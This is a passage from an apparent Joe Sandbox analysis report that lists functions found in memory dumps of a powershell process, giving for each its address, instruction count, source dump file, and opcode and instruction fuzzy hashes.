                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_76c0000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: d9d2220a47f30deccb1dfe4e8d538219bbba7c85725809530da5e0ed4c69c1b3
                                                                                          • Instruction ID: 06c8f8a1577276d630bd888124312482cf5aff54b89b29529b33e6d91dc6ee29
                                                                                          • Opcode Fuzzy Hash: d9d2220a47f30deccb1dfe4e8d538219bbba7c85725809530da5e0ed4c69c1b3
                                                                                          • Instruction Fuzzy Hash: 3841E4F0B002029BDB20CA7A85007BAB7A2DBC5714F58C4AEE9069F355D731ED45CB66
                                                                                          Function 04966FB0 Relevance: .1, Instructions: 124COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2365988867.0000000004960000.00000040.00000800.00020000.00000000.sdmp, Offset: 04960000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_4960000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: f31e7fb927fb4e1a197cc333ab4b579c263a543f73fe4183c200cf6fde9f116c
                                                                                          • Instruction ID: a424b2dc382f076138432cb7fc1751cf3b64d85a0940a1eea7c80e4b17f7d0f2
                                                                                          • Opcode Fuzzy Hash: f31e7fb927fb4e1a197cc333ab4b579c263a543f73fe4183c200cf6fde9f116c
                                                                                          • Instruction Fuzzy Hash: 4D4183346092449FDB05CBA4C954AADBFF1AF8A314F1940E9D446EF3A2CB36EC01CB61
                                                                                          Function 04966FE0 Relevance: .1, Instructions: 114COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2365988867.0000000004960000.00000040.00000800.00020000.00000000.sdmp, Offset: 04960000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_4960000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 4d51600bcc5d037bb175051f815239e37a4650404bb32f873e2bbeb0c68ec793
                                                                                          • Instruction ID: fe2eb10aa8d02bb04ce410bb3086a9011a89d2613b6bee114178f748bef5ae88
                                                                                          • Opcode Fuzzy Hash: 4d51600bcc5d037bb175051f815239e37a4650404bb32f873e2bbeb0c68ec793
                                                                                          • Instruction Fuzzy Hash: BB415C34B042048FDB14DFA4C468AAEBBF2EF8D715F1544A9D402AB395CB35ED01CB61
                                                                                          Function 04962B00 Relevance: .1, Instructions: 108COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2365988867.0000000004960000.00000040.00000800.00020000.00000000.sdmp, Offset: 04960000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_4960000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 76245a8b632cfd84743d1560f96825dd39afb308ca05c0de45587f5c1fd6d520
                                                                                          • Instruction ID: d741885547d2c289e9b7e93bad4c809170ca88efe5ecdbad510c0d0b7be60daa
                                                                                          • Opcode Fuzzy Hash: 76245a8b632cfd84743d1560f96825dd39afb308ca05c0de45587f5c1fd6d520
                                                                                          • Instruction Fuzzy Hash: 23416974A00605DFCB05CF59C5989AEFBB5FF48310B1185A9D916AB364C736FC51CBA0
                                                                                          Function 0496C388 Relevance: .1, Instructions: 101COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2365988867.0000000004960000.00000040.00000800.00020000.00000000.sdmp, Offset: 04960000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_4960000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: d2151159d130682edb04914c5631aa2bf8282943d2214119a3313d87829e15f1
                                                                                          • Instruction ID: f3c5fc6b09992d26e27d8d993bb953af636738648045d1bfc45eb1494dcdcc55
                                                                                          • Opcode Fuzzy Hash: d2151159d130682edb04914c5631aa2bf8282943d2214119a3313d87829e15f1
                                                                                          • Instruction Fuzzy Hash: 73317E353016019FD709EB68E854B9ABB96EBC4315F00867DE64ACB351DFB5A805C7E0
                                                                                          Function 0496AE60 Relevance: .1, Instructions: 88COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2365988867.0000000004960000.00000040.00000800.00020000.00000000.sdmp, Offset: 04960000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_4960000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 1cf5813a1f3e724f0cd26cb86db830a0a1fcd0d360dffea502cd1bed31679c24
                                                                                          • Instruction ID: 1f955080d7d137147619a87cfa234b56a8213e3556c84c7039d6fc24aaf82e1e
                                                                                          • Opcode Fuzzy Hash: 1cf5813a1f3e724f0cd26cb86db830a0a1fcd0d360dffea502cd1bed31679c24
                                                                                          • Instruction Fuzzy Hash: 38315C70E012099FDB05DFB9D494AAEBBF6EFCA310F14806DE406EB351EA749C418B91
                                                                                          Function 0496AD28 Relevance: .1, Instructions: 84COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2365988867.0000000004960000.00000040.00000800.00020000.00000000.sdmp, Offset: 04960000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_4960000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: f43ff5a82d4340070242b8ec9ad468982aa3a532a9e0e05f38ffc222d2a72ecc
                                                                                          • Instruction ID: 6eca7f4095b456a7574ba58421a9cbe01c6269a54943d220feea5545440037f2
                                                                                          • Opcode Fuzzy Hash: f43ff5a82d4340070242b8ec9ad468982aa3a532a9e0e05f38ffc222d2a72ecc
                                                                                          • Instruction Fuzzy Hash: 3A316CB8A052459FEB05EBA4D854AEEBFB2EFC5300F1584A9D101AB395CA74AD01CB61
                                                                                          Function 0496AE70 Relevance: .1, Instructions: 84COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2365988867.0000000004960000.00000040.00000800.00020000.00000000.sdmp, Offset: 04960000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_4960000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 509673b6c7feedd3a918c24d8ecfd09507bfe40efba30c80153c9b4cdeb5e5c1
                                                                                          • Instruction ID: 76c55017a4c80eb00c0dfd985a036afb8167416d28bf63fd88888db919cd0e94
                                                                                          • Opcode Fuzzy Hash: 509673b6c7feedd3a918c24d8ecfd09507bfe40efba30c80153c9b4cdeb5e5c1
                                                                                          • Instruction Fuzzy Hash: DA312F74E012099FDB05DFA9D4947AEBAF6EFC9310F148029E506EB351EA749C418B91
                                                                                          Function 0496AF98 Relevance: .1, Instructions: 80COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2365988867.0000000004960000.00000040.00000800.00020000.00000000.sdmp, Offset: 04960000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_4960000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: bdb61bad8b005ec5dd19e11a93455ceffde69fe7c1c1933a240ac61023bfb905
                                                                                          • Instruction ID: e4a334c2baa24066cdf22e5ce732f903275a32e519ddedfaac25724841f30dad
                                                                                          • Opcode Fuzzy Hash: bdb61bad8b005ec5dd19e11a93455ceffde69fe7c1c1933a240ac61023bfb905
                                                                                          • Instruction Fuzzy Hash: 01219C75A043588FCB14DFAED80079EBFF9AB89320F24846AD509E7340DB75A9058BA5
                                                                                          Function 0496E049 Relevance: .1, Instructions: 79COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2365988867.0000000004960000.00000040.00000800.00020000.00000000.sdmp, Offset: 04960000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_4960000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: c4c16d1d15e29f8de598b8981923807a97bddec4902be49fb9367bfc0217b28f
                                                                                          • Instruction ID: 9be08c1175d2e2d62be8fbecefce0126b36d8333f7ee37992de9720e63a805b1
                                                                                          • Opcode Fuzzy Hash: c4c16d1d15e29f8de598b8981923807a97bddec4902be49fb9367bfc0217b28f
                                                                                          • Instruction Fuzzy Hash: 4A318D78A012048FCB14EF68D498A9DBBF2EF89324F04456DD402EB3A4DB34AC84CF95
                                                                                          Function 0496E058 Relevance: .1, Instructions: 77COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2365988867.0000000004960000.00000040.00000800.00020000.00000000.sdmp, Offset: 04960000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_4960000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: b7786af2514ede5944595d7e91f856e6075013a64ae3039796d490499ef84cdf
                                                                                          • Instruction ID: 935adf243cb533b6e272b3f43230c4d6fb66a1db97a51a295c2a0cb951a68ecd
                                                                                          • Opcode Fuzzy Hash: b7786af2514ede5944595d7e91f856e6075013a64ae3039796d490499ef84cdf
                                                                                          • Instruction Fuzzy Hash: C5314978A012048FCB14EF68D498A9EBBF6EF89324F04456DD406EB3A4DB74AC45CF94
                                                                                          Function 0496AD38 Relevance: .1, Instructions: 77COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2365988867.0000000004960000.00000040.00000800.00020000.00000000.sdmp, Offset: 04960000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_4960000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 1bfee378d029d0545d8ebbd5da878977db4311efcee2aa8f7ae1606bf83965d2
                                                                                          • Instruction ID: 93ebeab470d54cbdeb628f9b0b69ff089184af8cfad2e27cb7aae734137882fa
                                                                                          • Opcode Fuzzy Hash: 1bfee378d029d0545d8ebbd5da878977db4311efcee2aa8f7ae1606bf83965d2
                                                                                          • Instruction Fuzzy Hash: 95310FB8A012099FEB44EFA4D854AEE7BB6EFC4300F1184A9D515BB394DE75AD018F90
                                                                                          Function 0301F3D8 Relevance: .1, Instructions: 76COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2365316170.000000000301D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0301D000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_301d000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 8cc99ce0656be4d81609024566c73423329c1893582317fa6e67845470fcfb7b
                                                                                          • Instruction ID: 2d6413c5921f0d6aefb2353c89e160b3200d84bf810e4994e4ab6f2d5e3b30d8
                                                                                          • Opcode Fuzzy Hash: 8cc99ce0656be4d81609024566c73423329c1893582317fa6e67845470fcfb7b
                                                                                          • Instruction Fuzzy Hash: C4212476508301EFCB05DF10D9C0B2ABBA5FB88314F24C6ADE9090A656C736C466DBA1
                                                                                          Function 049693F0 Relevance: .1, Instructions: 72COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2365988867.0000000004960000.00000040.00000800.00020000.00000000.sdmp, Offset: 04960000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_4960000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: f61d268e89bedc2e4a57ea121d733f79b77c5270aa50df5040a71f10a5dc6838
                                                                                          • Instruction ID: c224e9d5ac122c46baf35c4502aca50517a047efee2a85290ceae3fc203e4d7d
                                                                                          • Opcode Fuzzy Hash: f61d268e89bedc2e4a57ea121d733f79b77c5270aa50df5040a71f10a5dc6838
                                                                                          • Instruction Fuzzy Hash: 1D318FB5A057448EDB60CF6AD1883CAFFF6EF89320F28C46DC84E97255D674A441CB61
                                                                                          Function 0301F02C Relevance: .1, Instructions: 72COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2365316170.000000000301D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0301D000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_301d000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: dfc590478a2b081b1e144dd574d78545d43b550d2a5d95fff152f03f21c14ba0
                                                                                          • Instruction ID: 08f2d351d45cff5ab948c7e92beff385dee8ae131323c2d0ba455f917d75c2a1
                                                                                          • Opcode Fuzzy Hash: dfc590478a2b081b1e144dd574d78545d43b550d2a5d95fff152f03f21c14ba0
                                                                                          • Instruction Fuzzy Hash: DF217675104301EFCB15DF24C9C0B2ABFA5FB84324F24CBADD90A0B252C77AD466CA61
                                                                                          Function 04969400 Relevance: .1, Instructions: 69COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2365988867.0000000004960000.00000040.00000800.00020000.00000000.sdmp, Offset: 04960000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_4960000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 9379bb059f2a4bdd758bc32e2b4ac5e2a42444ae61ea6e6913f1e6678dc2f924
                                                                                          • Instruction ID: 67b1c1d7fe1caf3844e65de7825963ace18a489822a31f7b076625060cc1b0c1
                                                                                          • Opcode Fuzzy Hash: 9379bb059f2a4bdd758bc32e2b4ac5e2a42444ae61ea6e6913f1e6678dc2f924
                                                                                          • Instruction Fuzzy Hash: 06217CB4A057448FDB60CF6AC08838AFFF6EF89320F28C42ED80E97245D6746441CB61
                                                                                          Function 0301F4CC Relevance: .1, Instructions: 69COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2365316170.000000000301D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0301D000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_301d000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: b361001a0e4d59c283ff96ce5367edd726b6b628a333843b61a921a5d675ab78
                                                                                          • Instruction ID: 6474642b34f155994c3a9e5583ffa602aabb83ae67520ccd26525733aee7fc76
                                                                                          • Opcode Fuzzy Hash: b361001a0e4d59c283ff96ce5367edd726b6b628a333843b61a921a5d675ab78
                                                                                          • Instruction Fuzzy Hash: BE216AB1605341DFDB14DF14D5C0B2ABBA5FB84314F24CBACDA094B346C73AD456CA61
                                                                                          Function 0496767C Relevance: .1, Instructions: 62COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2365988867.0000000004960000.00000040.00000800.00020000.00000000.sdmp, Offset: 04960000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_4960000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: a523c9f6b4436ea714bece732e7aa153fd92264221ad0145aef656839e5043d5
                                                                                          • Instruction ID: d45188958d47f22e6929338dba9c21fbbbb4a5f39895c7f9ee70e5beeead71a7
                                                                                          • Opcode Fuzzy Hash: a523c9f6b4436ea714bece732e7aa153fd92264221ad0145aef656839e5043d5
                                                                                          • Instruction Fuzzy Hash: 4B11E979B00118CFCB04DFACE8409EDB7F6EBC8265B0540A5E609EB315DB35ED118BA1
                                                                                          Function 076C1990 Relevance: .1, Instructions: 58COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2375804722.00000000076C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076C0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_76c0000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 65e0932700a7b5ec2c85371e4f2b3877a8f9e8557817b38d2e736162a1fb35ca
                                                                                          • Instruction ID: 7a83bf49ec9be470c63c0840d6d28d78248bc96d5f017e6076d04699bf318656
                                                                                          • Opcode Fuzzy Hash: 65e0932700a7b5ec2c85371e4f2b3877a8f9e8557817b38d2e736162a1fb35ca
                                                                                          • Instruction Fuzzy Hash: 1811B2F1A0020ADFCB28DFA9C544B7AB7E1EF46211F4881AEE5068B312D730D851CBA1
                                                                                          Function 0301F3D3 Relevance: .1, Instructions: 57COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2365316170.000000000301D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0301D000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_301d000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 226763f8ebee4a326c53d81c1b8fbc9c4432138e5169b0b621e51b23af87bf07
                                                                                          • Instruction ID: 5a5f84d454365f38e6e1c57d0170e1efb7716c80d03dbc6dce6ebd666b2ab398
                                                                                          • Opcode Fuzzy Hash: 226763f8ebee4a326c53d81c1b8fbc9c4432138e5169b0b621e51b23af87bf07
                                                                                          • Instruction Fuzzy Hash: E721CD76504240DFCF06CF10D9C0B16BFB2FB88314F28C6A9D8494A666C33AD46ADF91
                                                                                          Function 0301F027 Relevance: .1, Instructions: 53COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2365316170.000000000301D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0301D000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_301d000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 1baa4135a3ffa84b7eafa0616a1ffb5636ea4d9d3a95b2124a7f7c9932413226
                                                                                          • Instruction ID: 4b504ecbe696e1229a7d531c8a15a4c6600ebe2350f0ab99a785f8d88d6ce171
                                                                                          • Opcode Fuzzy Hash: 1baa4135a3ffa84b7eafa0616a1ffb5636ea4d9d3a95b2124a7f7c9932413226
                                                                                          • Instruction Fuzzy Hash: 6911DD7A505280CFCB12CF14D5C0B15FFA1FB84328F28C6AAD8094B656C33AD45ACB61
                                                                                          Function 0301F4C7 Relevance: .0, Instructions: 50COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2365316170.000000000301D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0301D000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_301d000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 54e937d2f642825418ee9ae18dedb5dcdd39905f3497500ca018ffbd85fd39bc
                                                                                          • Instruction ID: 3ecdce040841e4ab11146c64f39b58164f165311b86d8c2ed72fa591857998f5
                                                                                          • Opcode Fuzzy Hash: 54e937d2f642825418ee9ae18dedb5dcdd39905f3497500ca018ffbd85fd39bc
                                                                                          • Instruction Fuzzy Hash: FD11E0B5505280CFCB15DF14D5C4B25FBB1FB44314F28C6ADC9498B656C33AD45ACB92
                                                                                          Function 0496BCE0 Relevance: .0, Instructions: 49COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2365988867.0000000004960000.00000040.00000800.00020000.00000000.sdmp, Offset: 04960000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_4960000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 6aa6777e0ea37994ad8c3ae53daca8040a0d2dc66c7d4c4703a8469c6e583014
                                                                                          • Instruction ID: cadbe67ca7fa2af03d32b0b490656c3a539c6056df755a8b5c596204508bdf6a
                                                                                          • Opcode Fuzzy Hash: 6aa6777e0ea37994ad8c3ae53daca8040a0d2dc66c7d4c4703a8469c6e583014
                                                                                          • Instruction Fuzzy Hash: 4C01F5316087405FC714CB39C494A597FE8AF45210F1448EED08ECB6A2DB20F845C741
                                                                                          Function 0496DC98 Relevance: .0, Instructions: 48COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2365988867.0000000004960000.00000040.00000800.00020000.00000000.sdmp, Offset: 04960000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_4960000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 65c6f03c6f29f0812ace1e99be337db9fbacd0edb2dcfc9684679d412d30f032
                                                                                          • Instruction ID: c60d6a1f789832480a5cc4c7b1bcdce0c88d97629b585e590bcaf49ea57f47f8
                                                                                          • Opcode Fuzzy Hash: 65c6f03c6f29f0812ace1e99be337db9fbacd0edb2dcfc9684679d412d30f032
                                                                                          • Instruction Fuzzy Hash: C0110535204754CFC728DF79D08099ABBF6EF8921536489ADD48A8BBA0CB36F845CF50
                                                                                          Function 0496DF20 Relevance: .0, Instructions: 48COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2365988867.0000000004960000.00000040.00000800.00020000.00000000.sdmp, Offset: 04960000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_4960000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 2f4516024225673a7f1c74e822f2e524c90cb000c47354927758a45927f8462a
                                                                                          • Instruction ID: b0c953c895bc195a23aff3707960477f75807857e7e8112cc089d97ffdde10e2
                                                                                          • Opcode Fuzzy Hash: 2f4516024225673a7f1c74e822f2e524c90cb000c47354927758a45927f8462a
                                                                                          • Instruction Fuzzy Hash: 49014035B012149FCB119B75E808AEEBBF9FBC9315F14406DE91A93642DB329911CB91
                                                                                          Function 0301D01D Relevance: .0, Instructions: 45COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2365316170.000000000301D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0301D000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_301d000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: f0de20a715111444514b8c81f44f90bfc8a8b72a15d3d96293bc895eecb7bd0c
                                                                                          • Instruction ID: 65ed7a9960cf5ca5fe5468bbe3f68d88a206adb5566e8aa5d4ff8c675fd473d7
                                                                                          • Opcode Fuzzy Hash: f0de20a715111444514b8c81f44f90bfc8a8b72a15d3d96293bc895eecb7bd0c
                                                                                          • Instruction Fuzzy Hash: 9001F771406340DAE7518A25CD80B76FFD8EF41324F1CC45ADE480A142C6B89441C6B1
                                                                                          Function 0496BF10 Relevance: .0, Instructions: 44COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2365988867.0000000004960000.00000040.00000800.00020000.00000000.sdmp, Offset: 04960000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_4960000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 861420f1b98a7bfb800647fae51cabab8152f5d67b1edb5c0bb5f18af4125dd7
                                                                                          • Instruction ID: cd607c5efd333566c5182d6243e930808a1c8f16e5b2ab80ff4b4ba5408ad76a
                                                                                          • Opcode Fuzzy Hash: 861420f1b98a7bfb800647fae51cabab8152f5d67b1edb5c0bb5f18af4125dd7
                                                                                          • Instruction Fuzzy Hash: 6BF0A43130A3A01FD7028A7A9C909B77FE9DF8662070945BBF485CB262C970CC04C760
                                                                                          Function 0301D007 Relevance: .0, Instructions: 44COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2365316170.000000000301D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0301D000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_301d000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 4aae912d04402635c64ddc4a82c6260fb9bc081c6bd4aef91221842fbe977e44
                                                                                          • Instruction ID: e1b40ca44dfd79ab40d477af9812d46f7fca14151ec821f69185938ec52d6add
                                                                                          • Opcode Fuzzy Hash: 4aae912d04402635c64ddc4a82c6260fb9bc081c6bd4aef91221842fbe977e44
                                                                                          • Instruction Fuzzy Hash: 3F01007240E3C09EE7528B25CD94B62BFB4EF43224F1D81DBD9888F1A3C2695845D772
                                                                                          Function 049690CF Relevance: .0, Instructions: 38COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2365988867.0000000004960000.00000040.00000800.00020000.00000000.sdmp, Offset: 04960000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_4960000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: f24b2950766e298ddb5f46196f1a915717ef1fc0f6940e798fd8d868a1601bd7
                                                                                          • Instruction ID: f0514228da5b920de50f5be76d9f682fffdf00a9efd8078cc608903d5cc7277a
                                                                                          • Opcode Fuzzy Hash: f24b2950766e298ddb5f46196f1a915717ef1fc0f6940e798fd8d868a1601bd7
                                                                                          • Instruction Fuzzy Hash: 350128796092804FD302DB7494197DF7BB1DFC2309F0480AFC5468B692CE396906C7E1
                                                                                          Function 04967958 Relevance: .0, Instructions: 38COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2365988867.0000000004960000.00000040.00000800.00020000.00000000.sdmp, Offset: 04960000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_4960000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: a5ca03b275a05e2a9dd966e3a661ab21042086ec98e6e0df494058130dddd6c0
                                                                                          • Instruction ID: ee7f933ff052af4ff20d8542f45fad4515e5e12b99ded1f7dd5df846b5e932af
                                                                                          • Opcode Fuzzy Hash: a5ca03b275a05e2a9dd966e3a661ab21042086ec98e6e0df494058130dddd6c0
                                                                                          • Instruction Fuzzy Hash: C4F02471701204AFD7108AA9E844EAF7BE5EBC8631B00466DE14ACB780CF70AD0587A0
                                                                                          Function 0301D9A7 Relevance: .0, Instructions: 37COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2365316170.000000000301D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0301D000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_301d000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: ec6a83ac2113167bd6c15d1eda964d638091f8ed5682886cceeb96e08afb2972
                                                                                          • Instruction ID: 6f0fdb3125d27601a60c6254f57bd70483c9b7b1d1bcbe3b17a14522856acec7
                                                                                          • Opcode Fuzzy Hash: ec6a83ac2113167bd6c15d1eda964d638091f8ed5682886cceeb96e08afb2972
